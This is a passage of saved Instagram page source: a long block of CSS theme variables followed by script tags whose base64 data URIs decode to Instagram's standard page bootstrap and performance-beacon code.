0.15);--primary-deemphasized-button-text:#2D88FF;--primary-icon:#E4E6EB;--primary-text:#E4E6EB;--primary-text-on-media:white;--primary-web-focus-indicator:#D24294;--progress-ring-neutral-background:rgba(255, 255, 255, 0.2);--progress-ring-neutral-foreground:#ffffff;--progress-ring-on-media-background:rgba(255, 255, 255, 0.2);--progress-ring-on-media-foreground:#FFFFFF;--progress-ring-blue-background:rgba(45, 136, 255, 0.2);--progress-ring-blue-foreground:hsl(214, 100%, 59%);--progress-ring-disabled-background:rgba(122,125,130, 0.2);--progress-ring-disabled-foreground:#7A7D82;--rating-star-active:#FF9831;--scroll-thumb:rgba(255, 255, 255, 0.3);--scroll-shadow:0 1px 2px rgba(0, 0, 0, 0.1), 0 -1px rgba(255, 255, 255, 0.05) inset;--secondary-button-background:rgba(255,255,255,.1);--secondary-button-background-floating:#4B4C4F;--secondary-button-background-on-dark:rgba(255, 255, 255, 0.4);--secondary-button-pressed:rgba(0, 0, 0, 0.05);--secondary-button-stroke:transparent;--secondary-button-text:#E4E6EB;--secondary-icon:#B0B3B8;--secondary-text:#B0B3B8;--secondary-text-on-media:rgba(255, 255, 255, 0.9);--section-header-text:#BCC0C4;--shadow-1:rgba(0, 0, 0, 0.1);--shadow-2:rgba(0, 0, 0, 0.2);--shadow-5:rgba(0, 0, 0, 0.5);--shadow-8:rgba(0, 0, 0, 0.8);--shadow-base:0 1px 2px var(--shadow-2);--shadow-elevated:0 8px 20px 0 rgba(0, 0, 0, 0.2), 0 2px 4px 0 rgba(0, 0, 0, 0.1);--shadow-emphasis:0 2px 12px var(--shadow-2);--shadow-inset:rgba(255, 255, 255, 0.05);--shadow-on-media:0px 0px 1px rgba(0, 0, 0, 0.62);--shadow-persistent:0px 0px 12px rgba(28, 43, 51, 0.6);--shadow-primary:0px 0px 12px rgba(28, 43, 51, 0.1);--shadow-responsive:0px 8px 16px 0px rgba(0, 0, 0, 0.1);--surface-background:#242526;--switch-active:hsl(214, 100%, 59%);--switch-inactive:#3E4042;--switch-unchecked-background-color:#6F7276;--text-highlight:rgba(24, 119, 242, 0.45);--input-background:#242526;--input-background-hover:var(--input-background);--input-background-warn-hover:hsla(var(--warning-h), var(--warning-s), var(--warning-l), 0.05);--input-background-error-hover:hsla(var(--negative-h), var(--negative-s), var(--negative-l), 0.05);--input-background-active:hsla(var(--accent-h), var(--accent-s), var(--accent-l), 0.05);--input-background-warn-active:hsla(var(--warning-h), var(--warning-s), var(--warning-l), 0.05);--input-background-error-active:hsla(var(--negative-h), var(--negative-s), var(--negative-l), 0.05);--input-background-disabled:#18191A;--input-border-color:#3E4042;--input-border-color-hover:var(--placeholder-text);--input-label-color-highlighted:hsl(214, 100%, 59%);--input-label-color-inside:var(--secondary-text);--input-label-color-error:var(--negative);--input-label-color-disabled:var(--disabled-text);--text-input-outside-label:#FFFFFF;--toast-background:#242526;--toast-text:#FFFFFF;--toast-text-link:#4599FF;--toast-border-color:transparent;--toast-border-style:none;--toast-border-width:0px;--toggle-active-background:rgb(45, 136, 255);--toggle-active-icon:#FFFFFF;--toggle-active-text:#FFFFFF;--toggle-button-active-background:#E6F2FF;--tooltip-background:rgba(11, 11, 11, 0.8);--tooltip-box-shadow:0 2px 4px 0 var(--shadow-5);--popover-border-color:transparent;--wash:#3E4042;--web-wash:#18191A;--warning:hsl(40, 89%, 52%);--chat-bubble-emphasis-ring-after:white;--chat-bubble-emphasis-ring-before:black;--chat-text-blockquote-color-background-line:rgba(255, 255, 255, 0.19);--chat-text-blockquote-color-text-primary-media:rgba(255, 255, 255, 0.7);--chat-incoming-message-bubble-background-color:#303030;--chat-outgoing-message-bubble-background-color:var(--accent);--chat-replied-message-background-color:rgba(255, 255, 255, 0.12);--radio-border-color:var(--primary-icon);--radio-border-color-disabled:var(--disabled-button-background);--radio-border-color-selected:var(--accent);--radio-checked-icon-color:var(--accent);--radio-checked-icon-color-disabled:var(--disabled-button-background);--dialog-anchor-vertical-padding:56px;--header-height:0px;--global-panel-width:0px;--global-panel-width-expanded:0px;--alert-banner-corner-radius:8px;--button-corner-radius:4px;--button-corner-radius-medium:10px;--button-corner-radius-large:12px;--button-height-large:40px;--button-height-medium:36px;--button-padding-horizontal-large:16px;--button-padding-horizontal-medium:16px;--button-padding-icon-only:16px;--button-icon-padding-large:16px;--button-icon-padding-medium:16px;--button-inner-icon-spacing-large:3px;--button-inner-icon-spacing-medium:3px;--blueprint-button-height-medium:40px;--blueprint-button-height-large:48px;--card-corner-radius:4px;--card-box-shadow:0 12px 28px 0 var(--shadow-2), 0 2px 4px 0 var(--shadow-1);--card-padding-horizontal:10px;--card-padding-vertical:20px;--chip-corner-radius:6px;--comment-bubble:18px;--dialog-corner-radius:8px;--glimmer-corner-radius:8px;--image-corner-radius:4px;--infochip-medium-radius:12px;--input-corner-radius:6px;--input-border-width:1px;--nav-list-cell-corner-radius:8px;--list-cell-corner-radius:8px;--list-cell-min-height:52px;--list-cell-padding-vertical:20px;--list-cell-padding-vertical-with-addon:14px;--menu-base-list-item-padding-horizontal:8px;--menu-base-list-item-padding-vertical:12px;--menu-base-size-full-margin-end:48px;--menu-item-base-margin-horizontal:8px;--menu-item-base-margin-vertical:0px;--menu-item-base-padding-horizontal:8px;--menu-item-base-overlay-radius:4px;--menu-item-base-padding-vertical:12px;--menu-item-base-with-icon-padding-horizontal:var(--menu-item-base-padding-horizontal);--separator-menu-item-margin-horizontal:16px;--separator-menu-item-margin-vertical:4px;--nav-list-cell-min-height:0px;--nav-list-cell-padding-vertical:16px;--nav-list-cell-padding-vertical-with-addon:16px;--nux-card-body-padding-end:24px;--page-footer-padding-vertical:16px;--popover-border-style:none;--popover-border-width:0px;--section-header-addOnEnd-margin-horizontal:8px;--section-header-addOnStart-margin-horizontal:12px;--section-header-addOnEnd-button-padding-horizontal:0px;--section-header-addOnEnd-button-padding-vertical:0px;--section-header-padding-vertical:16px;--section-header-subtitle-margin-vertical:14px;--section-header-subtitle-with-addOnEnd-margin-vertical:6px;--tab-height:60px;--tab-icon-padding-end:0px;--tab-text-icon-gap:4px;--tab-underline-color:transparent;--tab-underline-height:3px;--text-badge-corner-radius:4px;--text-badge-padding-horizontal:6px;--text-badge-padding-vertical:6px;--text-input-multi-padding-between-text-scrollbar:20px;--text-input-multi-padding-scrollbar:16px;--text-input-caption-margin-top:10px;--text-input-padding-vertical:12px;--toast-addon-padding-horizontal:6px;--toast-addon-padding-vertical:6px;--toast-container-max-width:100%;--toast-container-min-width:288px;--toast-container-padding-horizontal:10px;--toast-container-padding-vertical:16px;--toast-corner-radius:8px;--toaster-view-max-width:328px;--tooltip-corner-radius:8px;--typeahead-list-outer-padding-vertical:2px;--fds-animation-enter-exit-in:cubic-bezier(0.14, 1, 0.34, 1);--fds-animation-enter-exit-out:cubic-bezier(0.45, 0.1, 0.2, 1);--fds-animation-swap-shuffle-in:cubic-bezier(0.14, 1, 0.34, 1);--fds-animation-swap-shuffle-out:cubic-bezier(0.45, 0.1, 0.2, 1);--fds-animation-move-in:cubic-bezier(0.17, 0.17, 0, 1);--fds-animation-move-out:cubic-bezier(0.17, 0.17, 0, 1);--fds-animation-expand-collapse-in:cubic-bezier(0.17, 0.17, 0, 1);--fds-animation-expand-collapse-out:cubic-bezier(0.17, 0.17, 0, 1);--fds-animation-passive-move-in:cubic-bezier(0.5, 0, 0.1, 1);--fds-animation-passive-move-out:cubic-bezier(0.5, 0, 0.1, 1);--fds-animation-quick-move-in:cubic-bezier(0.1, 0.9, 0.2, 1);--fds-animation-quick-move-out:cubic-bezier(0.1, 0.9, 0.2, 1);--fds-animation-fade-in:cubic-bezier(0, 0, 1, 1);--fds-animation-fade-out:cubic-bezier(0, 0, 1, 1);--fds-duration-extra-extra-short-in:100ms;--fds-duration-extra-extra-short-out:100ms;--fds-duration-extra-short-in:200ms;--fds-duration-extra-short-out:150ms;--fds-duration-short-in:280ms;--fds-duration-short-out:200ms;--fds-duration-medium-in:400ms;--fds-duration-medium-out:350ms;--fds-duration-long-in:500ms;--fds-duration-long-out:350ms;--fds-duration-extra-long-in:1000ms;--fds-duration-extra-long-out:1000ms;--fds-duration-none:0ms;--fds-fast:200ms;--fds-slow:400ms;--font-family-apple:system-ui, -apple-system, BlinkMacSystemFont, '.SFNSText-Regular', sans-serif;--font-family-code:ui-monospace, Menlo, Consolas, Monaco, monospace;--font-family-default:Helvetica, Arial, sans-serif;--font-family-segoe:Segoe UI Historic, Segoe UI, Helvetica, Arial, sans-serif;--body-font-family:Placeholder Font;--body-font-size:0.9375rem;--body-font-weight:400;--body-line-height:1.3333;--body-emphasized-font-family:Placeholder Font;--body-emphasized-font-size:0.9375rem;--body-emphasized-font-weight:600;--body-emphasized-line-height:1.3333;--headline1-font-family:Optimistic Display Bold, system-ui, sans-serif;--headline1-font-size:1.75rem;--headline1-font-weight:700;--headline1-line-height:1.2143;--headline2-font-family:Optimistic Display Bold, system-ui, sans-serif;--headline2-font-size:1.5rem;--headline2-font-weight:700;--headline2-line-height:1.25;--headline3-font-family:Optimistic Display Bold, system-ui, sans-serif;--headline3-font-size:1.0625rem;--headline3-font-weight:700;--headline3-line-height:1.2941;--meta-font-family:Placeholder Font;--meta-font-size:0.8125rem;--meta-font-weight:400;--meta-line-height:1.3846;--meta-emphasized-font-family:Placeholder Font;--meta-emphasized-font-size:0.8125rem;--meta-emphasized-font-weight:600;--meta-emphasized-line-height:1.3846;--primary-label-font-family:Optimistic Display Medium, system-ui, sans-serif;--primary-label-font-size:1.0625rem;--primary-label-font-weight:500;--primary-label-line-height:1.2941;--secondary-label-font-family:Placeholder Font;--secondary-label-font-size:0.9375rem;--secondary-label-font-weight:500;--secondary-label-line-height:1.3333;--tertiary-label-font-family:Placeholder Font;--tertiary-label-font-size:0.6875rem;--tertiary-label-font-weight:500;--tertiary-label-line-height:1.4545;--text-input-field-font-family:Placeholder Font;--text-input-field-font-size:1rem;--text-input-field-font-stretch:initial;--text-input-field-font-weight:500;--text-input-field-line-height:1.2941;--text-input-label-font-family:Placeholder Font;--text-input-label-font-size:17px;--text-input-label-font-size-scale-multiplier:0.75;--text-input-label-font-stretch:initial;--text-input-label-font-weight:400;--text-input-label-line-height:1.2941;--messenger-card-min-width:300px;--messenger-card-max-width:480px;--messenger-application-max-width:2560px;--messenger-sidebar-collapsed-width:44px;--messenger-sidebar-expanded-width:240px;--messenger-card-corner-radius:8px;--messenger-card-spacing:16px;--chat-bubble-padding-vertical:8px;--chat-bubble-padding-horizontal:12px;--chat-bubble-border-radius:18px;--dialog-size-medium-width:100%;--dialog-size-small-width:100%;--focus-ring-outline-forced-colors:2px auto transparent !important;--focus-ring-outline-link:2px auto var(--focus-ring-blue);--focus-ring-shadow-default:0 0 0 2px var(--always-white), 0 0 0 4px var(--focus-ring-blue);--focus-ring-shadow-inset:0 0 0 2px var(--focus-ring-blue) inset, 0 0 0 4px var(--always-white) inset;--glimmer-animation-direction:alternate;--glimmer-animation-duration:1000ms;--glimmer-animation-timing-function:steps(10, end);--glimmer-opacity-min:0.25;--glimmer-opacity-max:1;--radio-checked-icon-size-large:12px;--radio-checked-icon-size-medium:12px;--radio-border-width:2px;--radio-size-large:24px;--radio-size-medium:20px;--blue-primary:rgb(0,136,244);--blue-secondary:rgb(235,245,255);--blue-tertiary:rgb(4,59,114);--chartreuse-primary:rgb(106,147,22);--chartreuse-secondary:rgb(226,255,152);--chartreuse-tertiary:rgb(50,65,19);--cyan-primary:rgb(0,142,213);--cyan-secondary:rgb(231,245,255);--cyan-tertiary:rgb(15,63,93);--dataviz-primary-2:rgb(156,219,255);--dataviz-primary-3:rgb(73,156,255);--dataviz-secondary-1:rgb(92,87,210);--dataviz-secondary-2:rgb(142,129,255);--dataviz-secondary-3:rgb(119,45,88);--dataviz-supplementary-1:rgb(253,91,67);--dataviz-supplementary-2:rgb(161,132,0);--dataviz-supplementary-3:rgb(36,131,44);--dataviz-supplementary-4:rgb(232,234,238);--fuschia-primary:rgb(250,45,138);--fuschia-secondary:rgb(255,241,246);--fuschia-tertiary:rgb(118,14,62);--green-primary:rgb(43,154,53);--green-secondary:rgb(227,250,224);--green-tertiary:rgb(26,68,27);--magenta-primary:rgb(215,77,204);--magenta-secondary:rgb(255,239,254);--magenta-tertiary:rgb(96,36,91);--orange-primary:rgb(208,108,20);--orange-secondary:rgb(255,241,239);--orange-tertiary:rgb(94,49,14);--purple-primary:rgb(125,116,255);--purple-secondary:rgb(245,241,255);--purple-tertiary:rgb(55,50,121);--red-primary:rgb(251,60,68);--red-secondary:rgb(255,241,239);--red-tertiary:rgb(118,22,27);--teal-primary:rgb(0,152,124);--teal-secondary:rgb(227,247,241);--teal-tertiary:rgb(10,68,56);--yellow-primary:rgb(161,132,0);--yellow-secondary:rgb(255,246,161);--yellow-tertiary:rgb(72,59,12);--base-unit:4px;--blue-0:245, 251, 255;--blue-1:224, 241, 255;--blue-2:179, 219, 255;--blue-3:112, 188, 255;--blue-4:71, 175, 255;--blue-5:0, 149, 246;--blue-6:0, 116, 204;--blue-7:0, 87, 163;--blue-8:0, 55, 107;--blue-9:0, 41, 82;--breakpoint-medium-width:1536px;--breakpoint-small-width:1024px;--challenge-width:460px;--creation-header-height:43px;--creation-min-padding-x:32px;--creation-modal-max-height:898px;--creation-modal-min-height:391px;--creation-padding-x:64px;--creation-padding-y:112px;--creation-settings-width:340px;--cyan-5:39, 196, 245;--desktop-grid-item-margin:28px;--desktop-grid-item-margin-slim:4px;--desktop-in-feed-story-item-height:208px;--desktop-in-feed-story-item-width:116px;--desktop-nav-height:60px;--desktop-skinny-nav-height:60px;--desktop-story-tray-bottom-margin:48px;--desktop-story-tray-bottom-margin-denser:24px;--direct-attachment-image-grid-item-size:78px;--direct-attachment-story-height:150px;--direct-attachment-story-large-height:256px;--direct-attachment-story-large-width:164px;--direct-attachment-story-width:84px;--direct-message-max-width:236px;--fb-signup-page-profile-pic-size:88px;--feed-sidebar-padding:32px;--feed-sidebar-width:319px;--feed-width:470px;--feed-width-wide-story:630px;--feed-width-wide-story-prism:702px;--font-family-system:-apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;--font-family-system-prism:"Instagram Sans UI", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;--font-weight-system-bold:700;--font-weight-system-extra-bold:800;--font-weight-system-extra-light:200;--font-weight-system-light:300;--font-weight-system-medium:500;--font-weight-system-regular:400;--font-weight-system-semibold:600;--footer-width-wide:1150px;--gradient-lavender:211, 0, 197;--gradient-orange:255, 122, 0;--gradient-pink:255, 1, 105;--gradient-purple:118, 56, 250;--gradient-red:255, 48, 64;--gradient-yellow:255, 214, 0;--green-4:120, 222, 69;--green-5:88, 195, 34;--green-6:55, 166, 0;--grey-0:245, 245, 245;--grey-1:239, 239, 239;--grey-2:219, 219, 219;--grey-3:199, 199, 199;--grey-4:168, 168, 168;--grey-5:142, 142, 142;--grey-6:115, 115, 115;--grey-7:85, 85, 85;--grey-8:54, 54, 54;--grey-9:38, 38, 38;--grey-10:26, 26, 26;--grey-0-prism:248, 249, 249;--grey-1-prism:243, 245, 247;--grey-2-prism:233, 237, 240;--grey-3-prism:219, 223, 228;--grey-4-prism:162, 170, 180;--grey-5-prism:131, 137, 147;--grey-6-prism:111, 118, 128;--grey-7-prism:94, 100, 109;--grey-8-prism:50, 53, 57;--grey-9-prism:41, 41, 46;--grey-10-prism:33, 35, 38;--ig-badge:255, 48, 64;--ig-close-friends-refreshed:28, 209, 79;--ig-disabled-action-text:169, 219, 255;--ig-error-or-destructive:237, 73, 86;--ig-facebook-blue:53, 121, 234;--ig-live-badge:255, 1, 105;--ig-primary-button:0, 149, 246;--ig-primary-button-hover:24, 119, 242;--ig-secondary-icon:142, 142, 142;--ig-stroke-on-media:255, 255, 255;--ig-tertiary-button-background:255, 255, 255;--ig-tertiary-button-border:219, 219, 219;--ig-tertiary-button-hover:245, 245, 245;--ig-tertiary-button-text:38, 38, 38;--ig-subscribers-only:118, 56, 250;--ig-success:88, 195, 34;--ig-text-on-color:255, 255, 255;--ig-text-on-media:255, 255, 255;--in-feed-story-item-height:240px;--in-feed-story-item-width:135px;--in-feed-story-item-padding:12px;--input-border-radius:6px;--large-layout-min:1500px;--live-video-border-radius:4px;--media-content-card-width:350px;--media-content-card-width-small:300px;--media-info:335px;--medium-layout-max:1499px;--medium-layout-min:1080px;--medium-screen-max:875px;--medium-screen-min:736px;--mobile-grid-item-margin:2px;--mobile-nav-height:45px;--modal-backdrop-dark:rgba(0, 0, 0, 0.85);--modal-backdrop-default:rgba(0, 0, 0, 0.65);--modal-border-radius:12px;--modal-padding:16px;--modal-z-index:100;--nav-narrow-width:72px;--nav-medium-width:244px;--nav-wide-width:335px;--nav-bottom-screen-max:767px;--nav-narrow-screen-min:768px;--nav-medium-screen-min:1264px;--nav-wide-screen-min:1920px;--orange-5:253, 141, 50;--photo:600px;--pink-5:209, 8, 105;--polaris-feed-with-padding-threshold-min:640px;--polaris-extra-small-screen-max:413px;--polaris-small-screen-min:414px;--polaris-small-screen-max:735px;--polaris-medium-screen-min:736px;--polaris-medium-screen-max:875px;--polaris-large-screen-min:876px;--polaris-nav-bottom-screen-max:767px;--polaris-post-modal-small-screen-max:1366px;--polaris-post-modal-large-screen-min:1536px;--polaris-post-modal-large-height-max:1032px;--polaris-challenge-width:460px;--polaris-breakpoint-medium-width:1536px;--polaris-breakpoint-small-width:1024px;--polaris-site-width-narrow:600px;--polaris-site-width-wide:935px;--polaris-site-padding-top:30px;--purple-5:163, 7, 186;--red-4:255, 104, 116;--red-5:237, 73, 86;--red-6:198, 35, 48;--red-7:167, 3, 17;--reels-large-screen-min:1366px;--refinement-section-height:50px;--revamp-nav-bottom-toolbar-height:50px;--revamp-feed-card-max-height:835px;--revamp-feed-card-min-height:615px;--revamp-feed-card-media-min-width:390px;--revamp-feed-card-dense-padding:16px;--revamp-feed-item-spacing:20px;--revamp-feed-horizontal-padding-small-screen:24px;--revamp-feed-horizontal-padding-large-screen:32px;--revamp-feed-vertical-padding:32px;--right-rail-width:300px;--scrollable-content-header-height-large:56px;--scrollable-content-header-height-med:49px;--scrollable-content-header-height:44px;--search-box-height:40px;--search-modal-height-expanded:450px;--search-modal-height:362px;--search-modal-top-offset:12px;--search-result-height:50px;--search-result-inline-top-offset:60px;--search-result-list-width:375px;--site-width-narrow:600px;--site-width-wide:935px;--small-layout-max:1079px;--small-layout-min:800px;--small-screen-max:735px;--small-screen-min:414px;--story-progressbar-update-tick:0.1s;--story-swap-animation-duration:350ms;--system-10-font-size:10px;--system-10-line-height:12px;--system-11-font-size:11px;--system-11-line-height:13px;--system-12-font-size:12px;--system-12-line-height:16px;--system-14-font-size:14px;--system-14-line-height:18px;--system-16-font-size:16px;--system-16-line-height:20px;--system-18-font-size:18px;--system-18-line-height:24px;--system-20-font-size:20px;--system-20-line-height:25px;--system-22-font-size:22px;--system-22-line-height:26px;--system-24-font-size:24px;--system-24-line-height:27px;--system-26-font-size:26px;--system-26-line-height:28px;--system-28-font-size:28px;--system-28-line-height:32px;--system-30-font-size:30px;--system-30-line-height:36px;--system-32-font-size:32px;--system-32-line-height:40px;--web-always-black:0, 0, 0;--web-always-white:255, 255, 255;--web-overlay-on-media:38, 38, 38;--web-prism-black:15, 20, 25;--web-secondary-action:224, 241, 255;--yellow-5:253, 203, 92;--barcelona-logo:255, 255, 255;--challenge-link:219, 219, 219;--ig-banner-background:38, 38, 38;--ig-elevated-background:38, 38, 38;--ig-elevated-highlight-background:54, 54, 54;--ig-elevated-separator:54, 54, 54;--ig-focus-stroke:85, 85, 85;--ig-highlight-background:38, 38, 38;--ig-hover-overlay:255, 255, 255, 0.1;--ig-link:224, 241, 255;--ig-primary-background:0, 0, 0;--ig-primary-icon:245, 245, 245;--ig-primary-text:245, 245, 245;--ig-secondary-background:26, 26, 26;--ig-secondary-button:245, 245, 245;--ig-secondary-button-background:85, 85, 85, 0.7;--ig-secondary-button-hover:54, 54, 54;--ig-secondary-text:168, 168, 168;--ig-separator:38, 38, 38;--ig-stroke:54, 54, 54;--ig-temporary-highlight:0, 149, 246;--ig-tertiary-icon:115, 115, 115;--ig-tertiary-text:115, 115, 115;--post-separator:38, 38, 38;--tos-box-shadow:255, 255, 255;--ig-toggle-background-on-prism:248, 249, 249;--ig-toggle-background-off-prism:50, 53, 57;--ig-toggle-background-disabled-on-prism:111, 118, 128;--ig-toggle-background-disabled-off-prism:41, 41, 46;--ig-toggle-outline-prism:219, 223, 228;--ig-toggle-outline-disabled-prism:94, 100, 109;--ig-stroke-prism:15, 20, 25;--ig-stroke-disabled-on-prism:50, 53, 57;--ig-stroke-disabled-off-prism:33, 35, 38;--ig-dropdown-background:41, 41, 46;}</style><style data-btmanifest="1020948869_main" nonce="">@media (prefers-color-scheme: dark) {:root{background:#000;}}</style><script id="envjson" type="application/json" nonce="">{"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"routing_namespace":"igx_www","ig_server_override":"","use_fbt_parse_json":true,"compat_iframe_token":null,"clear_js_factory_after_used":true,"brsid":"7482530692769266283","promise_include_trace":false}</script><script nonce="" src="data:application/x-javascript; charset=utf-8;base64,Oy8qRkJfUEtHX0RFTElNKi8KCnZhciBkYXRhRWxlbWVudD1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiZW52anNvbiIpO2lmKGRhdGFFbGVtZW50IT1udWxsKXt2YXIgY29weVZhcmlhYmxlcz1mdW5jdGlvbihhKXtmb3IodmFyIGIgaW4gdmFyaWFibGVzKWFbYl09dmFyaWFibGVzW2JdfSx2YXJpYWJsZXM9SlNPTi5wYXJzZShkYXRhRWxlbWVudC50ZXh0Q29udGVudCk7d2luZG93LnJlcXVpcmVMYXp5P3dpbmRvdy5yZXF1aXJlTGF6eShbIkVudiJdLGNvcHlWYXJpYWJsZXMpOih3aW5kb3cuRW52PXdpbmRvdy5FbnZ8fHt9LGNvcHlWYXJpYWJsZXMod2luZG93LkVudikpfQovLyMgc291cmNlVVJMPWh0dHBzOi8vc3RhdGljLmNkbmluc3RhZ3JhbS5jb20vcnNyYy5waHAvdjQveUwvci9kYmdyTXNuRDE4cC5qcwo=" data-bootloader-hash="nxRKQO6" crossorigin="anonymous" data-p=":0" data-btmanifest="1020948869_main" data-c="1"></script><script nonce="" src="data:application/x-javascript; charset=utf-8;base64,Oy8qRkJfUEtHX0RFTElNKi8KCl9fYW5ub3RhdG9yPWZ1bmN0aW9uKGEpe3JldHVybiBhfSxfX2Rfc3R1Yj1bXSxfX2Q9ZnVuY3Rpb24oYSxiLGMsZCl7X19kX3N0dWIucHVzaChbYSxiLGMsZF0pfSxfX3JsX3N0dWI9W10scmVxdWlyZUxhenk9ZnVuY3Rpb24oKXtfX3JsX3N0dWIucHVzaChhcmd1bWVudHMpfTsKLy8jIHNvdXJjZVVSTD1odHRwczovL3N0YXRpYy5jZG5pbnN0YWdyYW0uY29tL3JzcmMucGhwL3Y0L3kyL3IvY01kX1Nab3Y5RWkuanMK" data-bootloader-hash="W7CcKyc" crossorigin="anonymous" data-p=":0" data-btmanifest="1020948869_main" data-c="1"></script><script nonce="" src="data:application/x-javascript; charset=utf-8;base64,Oy8qRkJfUEtHX0RFTElNKi8KCl9idGxkcj17fTsKLy8jIHNvdXJjZVVSTD1odHRwczovL3N0YXRpYy5jZG5pbnN0YWdyYW0uY29tL3JzcmMucGhwL3Y0L3lIL3IvWkxjS09iTnVPMWIuanMK" data-bootloader-hash="678jA6i" crossorigin="anonymous" data-p=":0" data-btmanifest="1020948869_main" data-c="1"></script><script id="__eqmc" type="application/json" nonce="">{"u":"\/ajax\/qm\/?__a=1&__user=0&__comet_req=7&jazoest=2956","e":"7482530692769266283","s":"\/","w":0,"f":null,"l":"AVoAPuZUzO8"}</script><script nonce="" src="data:application/x-javascript; charset=utf-8;base64,Oy8qRkJfUEtHX0RFTElNKi8KCnZhciBkYXRhRWxlbWVudD1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiX19lcW1jIik7aWYoZGF0YUVsZW1lbnQhPW51bGwpe3ZhciBwYXJhbXM9SlNPTi5wYXJzZShkYXRhRWxlbWVudC50ZXh0Q29udGVudCksdXJpPXBhcmFtcy51LGV2ZW50X2lkPXBhcmFtcy5lLHNjcmlwdF9wYXRoPXBhcmFtcy5zLHdlaWdodD1wYXJhbXMudyxmYl9kdHNnPXBhcmFtcy5mLGxzZD1wYXJhbXMubDtpZihuYXZpZ2F0b3Iuc2VuZEJlYWNvbil7dmFyIG1hcms9ZnVuY3Rpb24oYSxiKXt2YXIgYz1wJiZwLm5vdz9NYXRoLmZsb29yKHAubm93KCkpOk1hdGgubWF4KERhdGUubm93KCktc3RhcnQsMCk7YT0iZXZlbnRfaWQ9IitldmVudF9pZCsoYT09bnVsbD8iIjoiJm1hcmtlcl9pZD0iK2EpKyImbWFya2VyX3BhZ2VfdGltZT0iK2MrIiZzY3JpcHRfcGF0aD0iK2VuY29kZVVSSUNvbXBvbmVudChzY3JpcHRfcGF0aCkrIiZ3ZWlnaHQ9Iit3ZWlnaHQrKGI/IiZjbGllbnRfc3RhcnQ9MSI6IiIpKyhmYl9kdHNnPyImZmJfZHRzZz0iK2VuY29kZVVSSUNvbXBvbmVudChmYl9kdHNnKToiIikrKGxzZD8iJmxzZD0iK2VuY29kZVVSSUNvbXBvbmVudChsc2QpOiIiKTtjPW5ldyBCbG9iKFthXSx7dHlwZToiYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkIn0pO25hdmlnYXRvci5zZW5kQmVhY29uKHVyaSxjKX0sc3RhcnQ9RGF0ZS5ub3coKSxwPXdpbmRvdy5wZXJmb3JtYW5jZTttYXJrKHdlaWdodD4wPyJDbGllbnRTY3JpcHRTdGFydCI6bnVsbCwhMCk7d2VpZ2h0PjAmJndpbmRvdy5hZGRFdmVudExpc3RlbmVyKCJiZWZvcmV1bmxvYWQiLGZ1bmN0aW9uKCl7bWFyaygiQ2xpZW50VW5sb2FkIiwhMSl9KX19Ci8vIyBzb3VyY2VVUkw9aHR0cHM6Ly9zdGF0aWMuY2RuaW5zdGFncmFtLmNvbS9yc3JjLnBocC92NC95by9yL3JNalVWM3RsZzUtLmpzCg==" data-bootloader-hash="gVT/FdM" crossorigin="anonymous" data-p=":0" data-btmanifest="1020948869_main" data-c="1"></script><script nonce="" src="data:application/x-javascript; charset=utf-8;base64,Oy8qRkJfUEtHX0RFTElNKi8KCihmdW5jdGlvbigpe2Z1bmN0aW9uIGEoYSl7cmV0dXJuIGEucGFyZW50RWxlbWVudCE9PWRvY3VtZW50LmJvZHkmJmEucGFyZW50RWxlbWVudCE9PWRvY3VtZW50LmhlYWR9ZnVuY3Rpb24gYihhKXtyZXR1cm4gYS5ub2RlTmFtZT09PSJTQ1JJUFQifHxhLm5vZGVOYW1lPT09IkxJTksiJiYoKGE9YyhhKSk9PW51bGw/dm9pZCAwOmEuYXN5bmNDc3MpfWZ1bmN0aW9uIGMoYSl7cmV0dXJuIShhLmRhdGFzZXQgaW5zdGFuY2VvZiB3aW5kb3cuRE9NU3RyaW5nTWFwKT9udWxsOmEuZGF0YXNldH1mdW5jdGlvbiBkKGQpe3ZhciBlO3RyeXtpZihkLm5vZGVUeXBlIT09Tm9kZS5FTEVNRU5UX05PREUpcmV0dXJufWNhdGNoKGEpe3JldHVybn1pZihhKGQpfHwhYihkKSlyZXR1cm47dmFyIGY9KGU9YyhkKSk9PW51bGw/dm9pZCAwOmUuYm9vdGxvYWRlckhhc2g7aWYoZiE9bnVsbCYmZiE9PSIiKXt2YXIgZz1udWxsLGg9ZnVuY3Rpb24oKXt3aW5kb3cuX2J0bGRyW2ZdPTEsZz09bnVsbD92b2lkIDA6ZygpfTtnPWZ1bmN0aW9uKCl7ZC5yZW1vdmVFdmVudExpc3RlbmVyKCJsb2FkIixoKSxkLnJlbW92ZUV2ZW50TGlzdGVuZXIoImVycm9yIixoKX07ZC5hZGRFdmVudExpc3RlbmVyKCJsb2FkIixoKTtkLmFkZEV2ZW50TGlzdGVuZXIoImVycm9yIixoKX19QXJyYXkuZnJvbShkb2N1bWVudC5xdWVyeVNlbGVjdG9yQWxsKCdzY3JpcHQsbGlua1tkYXRhLWFzeW5jLWNzcz0iMSJdJykpLmZvckVhY2goZnVuY3Rpb24oYSl7cmV0dXJuIGQoYSl9KTt2YXIgZT1uZXcgTXV0YXRpb25PYnNlcnZlcihmdW5jdGlvbihhLGIpe2EuZm9yRWFjaChmdW5jdGlvbihhKXthLnR5cGU9PT0iY2hpbGRMaXN0IiYmQXJyYXkuZnJvbShhLmFkZGVkTm9kZXMpLmZvckVhY2goZnVuY3Rpb24oYSl7ZChhKX0pfSl9KTtlLm9ic2VydmUoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoImh0bWwiKVswXSx7YXR0cmlidXRlczohMSxjaGlsZExpc3Q6ITAsc3VidHJlZTohMH0pfSkoKTsKLy8jIHNvdXJjZVVSTD1odHRwczovL3N0YXRpYy5jZG5pbnN0YWdyYW0uY29tL3JzcmMucGhwL3Y0L3l2L3IvdHNxUDFCV0dPamMuanMK" data-bootloader-hash="YTRL02s" crossorigin="anonymous" data-p=":0" data-btmanifest="1020948869_main" data-c="1"></script><script type="application/json" data-content-len="82" data-sjs="">{"require":[["qplTimingsServerJS",null,null,["7482530692769266283","htmlStart"]]]}</script>
|
4
|
+
|
5
|
+
<link rel="preload" href="Instagram_files/lIT4Tm7t_PCcyf8QhNEWE-MbVu6J6TSgCAgbkPiBd1Gm.css" as="style" crossorigin="anonymous">
|
6
|
+
